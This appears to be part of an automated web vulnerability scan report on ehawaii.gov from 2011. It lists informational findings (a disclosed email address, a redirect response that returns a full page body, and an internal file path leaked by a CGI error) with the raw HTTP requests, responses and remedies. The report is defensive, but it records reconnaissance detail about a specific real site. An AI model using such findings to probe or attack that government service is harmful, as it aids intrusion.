E-mail addresses discovered within the application can be used by both spam email engines and also brute force tools. Furthermore valid email addresses may lead to social engineering attacks .

Remedy

Use generic email addresses such as contact@ or info@ for general communications, remove user/people specific e-mail addresses from the web site, should this be required use submission forms for this purpose.

External References

- /dakine/docs/subscription.html

/dakine/docs/subscription.html

http://www.ehawaii.gov/dakine/docs/subscription.html

Found E-mails

subscriber@ehawaii.gov

Request

GET /dakine/docs/subscription.html HTTP/1.1
Referer: http://www.ehawaii.gov/dakine/index.html
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)
Cache-Control: no-cache
Host: www.ehawaii.gov
Cookie: JSESSIONID=8B27D3DD68CA48300DC5C4232C59B6A8.lono
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 22:16:44 GMT
Server: Apache-Coyote/1.1
Content-Encoding:
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Content-Length: 3822


<?xml version="1.0"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" /><title>ehawaii.gov | Subcription Services</title><link rel="shortcut icon" href="/favicon.ico" type="image/x-icon" /><link rel="stylesheet" type="text/css" href="/dakine/css/main.css"/><!--[if lte IE 6]><link rel="stylesheet" type="text/css" href="/dakine/css/ie6.css"/><![endif]--><link href="/dakine/css/mobile.css" rel="stylesheet" type="text/css" media="handheld"><script type="text/javascript" src="/dakine/js/portal.js"></script></head><body><!-- START: Top Menu --><div id="top" align="center"> <div id="menu"> <ul> <li><a href="/dakine/search.html?tag=government" class="menu">Government</a></li> <li><a href="/dakine/search.html?tag=business" class="menu">Business</a></li> <li><a href="/dakine/search.html?tag=community" class="menu">Community</a></li> <li><a href="/dakine/search.html?tag=education" class="menu">Education</a></li> <li><a href="/dakine/search.html?tag=employment" class="menu">Employment</a></li> <li><a href="/dakine/search.html?tag=visiting" class="menu">Visiting</a></li> </ul> </div></div><!-- START: Header --><div id="header" align="center"> <div id="headerContent"> <div id="title"><a href="/dakine/index.html" class="noline"><img src="/dakine/images/title.jpg" border="0" alt="eHawaii.gov" /></a></div> <div id="seal"><a href="http://www.surveymonkey.com/s/hicredesign" class="noline"><img src="/dakine/images/hawaiisealandsurvey.jpg" border="0" alt="Survey" /></a></div> </div></div><!-- START: Subheader --><div id="subheader"> <div align="center"><div id="subheaderContent"> <span class="left"><span class="middle"><span class="right"> <div id="livehelp"><div id="ciMygb" style="z-index:100;position:absolute"></div><div id="scMygb" style="display:inline"></div><div id="sdMygb" style="display:none"></div><script type="text/javascript">var seMygb=document.createElement("script");seMygb.type="text/javascript";var seMygbs=(location.protocol.indexOf("https")==0?"https://secure.providesupport.com/image":"http://image.providesupport.com")+"/js/hic/safe-standard.js?ps_h=Mygb\u0026ps_t="+new Date().getTime()+"\u0026online-image=http%3A//www.ehawaii.gov/dakine/images/portal-online.gif\u0026offline-image=http%3A//www.ehawaii.gov/dakine/images/portal-offline.gif";setTimeout("seMygb.src=seMygbs;document.getElementById('sdMygb').appendChild(seMygb)",1)</script><noscript><div style="display:inline"><a href="http://www.providesupport.com?messenger=hic" class="noline">Customer Support Chat</a></div></noscript></div> <div id="search"><img src="/dakine/images/divider.gif" align="middle" /><img src="/dakine/images/magnifyingglass.jpg" align="middle" /><span class="searchText">Enter a few words describing the service you're looking for:</span> <form style="margin: 0; display: inline;" id="searchbox_012249442604008016873:fyi5sijjiuo" action="/dakine/search.html" method="get"> <input id="searchText" name="q" type="text" size="25" align="middle" value=""/>&nbsp;<select id="searchBy" name="searchby"> <option value="all" >All</option> <option value="tag" >Tags only</option> </select> <input type="hidden" name="cx" value="012249442604008016873:fyi5sijjiuo" /> <input type="hidden" name="cof" value="FORID:9" /> <input name="sa" type="submit" class="subhbutton" value="Search" /> </form> </div> </span></span></span> </div></div></div><center><!-- START: Content --><div id="container"><div align="center"><div id="columnLeftSubpg"> <div id="subpage"> <h1>Subscription Services </h1> <h3>Monthly Account Information </h3> <p>eHawaii.gov allows you to connect with state government like you never have before...from the convenience of your home or office! Instant, online access to important records and real-time form filing is only the beginning. When you become an eHawaii.gov subscriber, you'll have a wealth of interactive services at your fingertips, 24 hours a day, from anywhere in the world.</p> <p>A single, $75 annual registration fee offers the following:</p> <ul> <li class="yellow">Easy access to fee-based services, with the convenience of one monthly bill.</li> <li class="yellow">Individual usernames and passwords for up to 10 people in your organization.</li> <li class="yellow">Subscribers will not have to enter billing information for each individual transaction. Instead, pay one monthly bill using a credit card (VISA, MasterCard, American Express,and Discover) or Electronic Funds Transfer.</li> <li class="yellow">Subscribers can view billing summary reports and change their passwords anytime.</li> </ul> <p>Your subscriber gives you consolidated billing for:</p> <ul> <li class="yellow"><a href="http://hbe.ehawaii.gov/BizEx" target="_blank">Business Filings</a> (discounted filing fees!) - Business Filings</li> <li class="yellow"><a href="http://hbe.ehawaii.gov/documents" target="_blank">BREG Business Documents</a> - Order DCCA Documents</li> <li class="yellow"><a href="https://boc.ehawaii.gov/ucc-recording" target="_blank">UCC Filings</a> ($30 per filing) - File Uniform Commercial Code Documents</li> <li class="yellow"><a href="http://hbe.ehawaii.gov/annuals" target="_blank">Annual Business Filings</a> - Submit Hawaii Annual Reports</li> <li class="yellow"><a href="https://www.ehawaii.gov/dcca/listbuilder/exe/builder.cgi" target="_blank">Business Entity List Builder</a> ($.05 per record) - Get Business Entity Information</li> <li class="yellow"><a href="http://www.ehawaii.gov/dcca/pvllist/html" target="_blank">PVL List Builder</a> ($.05 per record) - Get Licensee Information</li> <li class="yellow"><a href="http://ecrim.ehawaii.gov" target="_blank">Criminal Histories</a> ($15 per record) - Order Criminal History Reports</li> <li class="yellow"><a href="http://www.ehawaii.gov/condo" target="_blank">AOAO Renewals</a> - Condominium and AOAO Renewals</li> <li class="yellow"><a href="http://boc.ehawaii.gov/docsearch" target="_blank">Conveyance Documents</a> - Order Conveyance Documents</li> <li class="yellow"><a href="http://vendors.ehawaii.gov" target="_blank">Hawaii Compliance Express</a> - Comply with Hawaii Vendor Compliance Rules</li> <li class="yellow"><a href="http://ag.ehawaii.gov/charity/welcome.html" target="_blank">Annual Charity Payments</a></li> <li class="yellow"><a href="https://hbe.ehawaii.gov/agentsearch" target="_blank">Agent Search</a></li> </ul> <p>Your subscriber is required for access to: (Rider agreement may be required)</p> <ul> <li class="yellow">Driver Records ($23 per record) - Driver History</li> <li class="yellow">Driver Monitoring ($.15/ person/ month) - Review Driver History </li> <li class="yellow">Bulk Business Entity Data ($1,000 per month) - All Business Entity Information</li> <li class="yellow">Bulk Professional and Vocational Licensing Data ($1,000 per month) - All PVL Licensee Non-Private Information</li> <li class="yellow">Bulk Sex Offender Data ($500 per month) - All Sex Offender Data</li> <li class="yellow">Hawaii Trails Reservation Access - Commercial Trail Reservations</li> <li class="yellow">Land Use Permit System - Commercial (Wedding) Land Use Permits</li> <li class="yellow"><a href="https://vms.ehawaii.gov" target="_blank">Vehicle Monitoring System</a> - Alerts you when your vehicles get violations.</li> </ul> <p>To become a subscriber, download the form below, complete it, and return to eHawaii.gov via fax or mail. See contact information below.</p> <p><a href="/dakine/subscriberagreement.pdf" target="_blank">Subscription Agreement</a> <img src="/dakine/images/icon-pdf.gif" width="16" height="16" align="absmiddle" /></p> <p>If you have questions or need assistance concerning subscriber services, please contact eHawaii.gov at <a href="mailto:subscriber@ehawaii.gov">subscriber@ehawaii.gov</a>.</p> </div></div><div id="columnRight"><span class="content"> <div id="mostPopular"> <h1>Contact Information </h1> <p><span class="small">ADDRESS</span><br /> 201 Merchant Street, Suite 1805<br /> Honolulu, HI 96813</p> <p><span class="small">TELEPHONE</span><br /> 808-695-4620</p> <p><span class="small">FAX</span><br /> 808-695-4618</p> <p><span class="small">E-FAX</span><br /> 808-441-3100 </p> <img src="/dakine/images/google.gif" align="absmiddle"/><a href="http://maps.google.com/maps?f=q&source=s_q&hl=en&geocode=&q=201+merchant+street+honolulu,+HI+96813&sll=37.0625,-95.677068&sspn=59.206892,135.263672&ie=UTF8&hq=&hnear=201+Merchant+St,+Honolulu,+Hawaii+96813&z=17" target="_blank" class="noline"><img src="/dakine/images/map.gif" border="0" /></a> <p><a href="http://maps.google.com/maps?f=q&source=s_q&hl=en&geocode=&q=201+merchant+street+honolulu,+HI+96813&sll=37.0625,-95.677068&sspn=59.206892,135.263672&ie=UTF8&hq=&hnear=201+Merchant+St,+Honolulu,+Hawaii+96813&z=17" target="_blank" class="smallgrey">View larger map</a> <img src="/dakine/images/icon-newwindow.gif" align="absmiddle" /> <div id="linegrey"></div> <div id="ciq4f5" style="z-index:100;position:absolute"></div><div id="scq4f5" style="display:inline"></div><div id="sdq4f5" style="display:none"></div><script type="text/javascript">var seq4f5=document.createElement("script");seq4f5.type="text/javascript";var seq4f5s=(location.protocol.indexOf("https")==0?"https":"http")+"://image.providesupport.com/js/hic/safe-standard.js?ps_h=q4f5&ps_t="+new Date().getTime()+"&online-image=http%3A//www.ehawaii.gov/dakine/images/livehelp-big.jpg&offline-image=http%3A//www.ehawaii.gov/dakine/images/livehelp-big.jpg";setTimeout("seq4f5.src=seq4f5s;document.getElementById('sdq4f5').appendChild(seq4f5)",1)</script><noscript><div style="display:inline"><a href="http://www.providesupport.com?messenger=hic">Customer Support Chat</a></div></noscript> <p style="margin-top:10px;"><a href="http://www.surveymonkey.com/s.aspx?sm=EHRSFlWd8uD8yxHM01CuIQ_3d_3d" class="noline"><img src="/dakine/images/feedback.jpg" border="0" /></a><a href="#" class="noline"></a></p> </div> </span></div></div></div><!-- START: Footer --></center></div><div id="footer" > <div id="footerContent" ><a href="/dakine/docs/about.html" class="copyrightLink">About Us</a><span class="copyrightDivider">|</span><a href="/dakine/docs/subscription.html" class="copyrightLink">Subscription Services</a><span class="copyrightDivider">|</span><a href="/dakine/docs/ada.html" class="copyrightLink">ADA Compliance</a><span class="copyrightDivider">|</span><a href="/dakine/docs/terms.html" class="copyrightLink">Terms of Use</a><span class="copyrightDivider">|</span><a href="/dakine/docs/privacy.html" class="copyrightLink">Privacy Policy</a><span class="copyrightDivider">|</span><a href="/dakine/docs/text.html" class="copyrightLink">Text Version</a><span class="copyrightDivider">|</span><a href="http://www.surveymonkey.com/s.aspx?sm=EHRSFlWd8uD8yxHM01CuIQ_3d_3d" class="copyrightLink">Feedback</a><br /> <span class="copyrighttext">&copy; 2010 HAWAII INFORMATION CONSORTIUM, LLC.</span> </div></div></div><script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script><script type="text/javascript">_uacct = "UA-939376-1";urchinTracker();</script></body></html>
Redirect Response BODY Is Too Large

Redirect Response BODY Is Too Large

1 TOTAL
INFORMATION
CONFIRMED
1
Netsparker identified that the response from the page returned an HTTP Redirect Status but output more information than usual. This generally indicates that after redirect, page did not finish the response as it was supposed to.

Impact

This can lead serious issues such authentication bypass in authentication required pages, in other pages it generally indicates a programming error.

Remedy

Finish the HTTP Response after you redirect the user.

In ASP.NET use Response.Redirect("redirected-page.aspx", true); instead of Response.Redirect("redirected-page.aspx", false); In PHP applications call exit(); after you redirect the user.
- /doh/vitrec/exe/vitrec.cgi

/doh/vitrec/exe/vitrec.cgi CONFIRMED

https://www.ehawaii.gov/doh/vitrec/exe/vitrec.cgi

Request

GET /doh/vitrec/exe/vitrec.cgi HTTP/1.1
Referer: http://www.ehawaii.gov/dakine/search.html?tag=community
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)
Cache-Control: no-cache
Host: www.ehawaii.gov
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 302 Moved
Date: Sat, 30 Apr 2011 22:16:58 GMT
Server: Apache
Location: https://www.ehawaii.gov/doh/vitrec/html/down.html
Content-Type: application/x-cgi
Connection: close


Content-Type: text/html; charset=ISO-8859-1

<html><head><title>DOH Online Vital Records Ordering || Home</title><LINK rel="stylesheet" href="/doh/vitrec/html/vitrec.css"><script language="javascript"> function goToNextPage() { document.location.href='disclaimer.html' }</script></head><body bgcolor="#eff7ff"><div align="center"><img src="/doh/vitrec/images/masterbanner.jpg" usemap="#Map" border="0" alt="eHawaiiGov Master Navigation Bar"> <map name="Map"> <area shape="rect" coords="0,2,130,48" href="http://www.ehawaiigov.org" target="_self" alt="Link to eHawaiiGov Home Page" title="Link to eHawaiiGov Home Page"> <area shape="rect" coords="130,1,296,48" href="http://www.ehawaiigov.org/online/html/all_svc.html" alt="State of Hawaii Online Services" title="State of Hawaii Online Services" target="_self"> <area shape="rect" coords="295,1,440,48" href="http://www.ehawaiigov.org/index/" target="_self" alt="Hawaii Information Link Index" title="Hawaii Information Link Index"> </map><img src="/doh/vitrec/images/vitrect_banner.jpg" border="0" alt="DOH Vital Records Banner"><br> <center> <table border="0" cellpadding="0" cellspacing="0" width="750"> <tr> <td align="center" class="subheads"><a href="/doh/vitrec/exe/vitrec.cgi">Home</a> || <a href="/doh/vitrec/html/contact.html">Contact Information</a> || <a href="http://www.ehawaiigov.org/cgi-bin/admin/feedback/exe/feedback.cgi?application_id=40" target="_blank">Feedback</a> || <a href="/doh/vitrec/exe/vitrec.cgi?form_name=disclaimer">Disclaimer</a> || <a href="/doh/vitrec_agency/index.cgi">Agency Login</a></td> </tr> </table> <br> <font class="heads">Welcome to the Department of Health's Online</font><br> <font class="heads">Vital Records Ordering System</font> <form action="/doh/vitrec/exe/vitrec.cgi" method="post"> <input type="hidden" name="form_name" value="disclaimer"> <input type="hidden" name="session_id" value=""> <table border="0" cellpadding="0" cellspacing="6" width="650"> <tr><td class="body"> Vital records (birth, death, marriage, and divorce certificates) for events that occurred in Hawaii are received and preserved by the Office of Health Status Monitoring, a unit of the Department of Health (DOH). In Hawaii, access to vital records is restricted by statute (HRS &sect;338-18). </td></tr> <tr><td class="body"> Certified copies of these records may be issued to authorized individuals and used for such diverse purposes as school entry, passports, Social Security participation, driver's licenses, employment, sports participation, survivor's benefits, proof of property rights, and other needs. </td></tr> <tr><td class="body"><b> This is only an ordering system for certified copies of vital records.The certified copies being ordered WILL NOT be issued online as a partof your transaction. You will receive the ordered certified copies viafirst-class postal mail within 4-6 weeks.</b> </td></tr> <tr><td class="body"><b>Orders received on this web site WILL NOT be given processing priorityover orders placed in-person or by postal mail on the same day.Processing of online orders will not be expedited and will be processedunder the DOH's standard procedures.</b> </td></tr> <tr><td class="body">You may order certified copies only of birth and marriage certificates and only of records dating from July 1909 to the present on this web site. You can also order certified copies of birth and marriage certificates, and must order certified copies of death and divorce certificates and certified copies of records dating before July 1909, through postal mail or in-person (see <a href="http://www.hawaii.gov/doh">www.hawaii.gov/doh</a> click on "vital records" for information). </td></tr> <tr><td class="body">You may order certified copies only of your own birth and marriagecertificates or of an immediate family member (e.g., a parent of his/herchild's birth or marriage certificate) on this web site. NOTE: Thissystem does exact matches only. Please enter data carefully as typographical errors will result in a failure to match. </td></tr> <tr><td height="3">&nbsp;</td></tr> <tr><td align="center" class="body"> <input type="submit" name="proceed" class="body" value="Proceed"> </td></tr> </table> </form> </center></div></body></html>
[Possible] Internal Path Leakage (*nix)

[Possible] Internal Path Leakage (*nix)

1 TOTAL
INFORMATION
Netsparker identified an internal path in the document.

Impact

There is no direct impact however this information can help an attacker during the exploitation of some other vulnerabilities.

Remediation

External References

- /dlnr/fish/exe/fish.cgi

/dlnr/fish/exe/fish.cgi

https://www.ehawaii.gov/dlnr/fish/exe/fish.cgi

Identified Internal Path(s)

/var/www/vhosts/www.ehawaii.gov/ssl/dlnr/fish/exe/fish.cgi

Request

POST /dlnr/fish/exe/fish.cgi HTTP/1.1
Referer: https://www.ehawaii.gov/dlnr/fish/exe/fresh_main_page.cgi
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: www.ehawaii.gov
Content-Length: 9
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

FROM=MAIN

Response

HTTP/1.0 200 OK
Date: Sat, 30 Apr 2011 22:17:25 GMT
Server: Apache
Content-Type: text/html
Connection: close


<h1>Software error:</h1><pre>Can't call method &quot;param&quot; on an undefined value at /var/www/vhosts/www.ehawaii.gov/ssl/dlnr/fish/exe/fish.cgi line 34.</pre><p>For help, please send mail to the webmaster (<a href="mailto:webmaster@ehawaii.gov">webmaster@ehawaii.gov</a>), giving this error message and the time and date of the error.</p>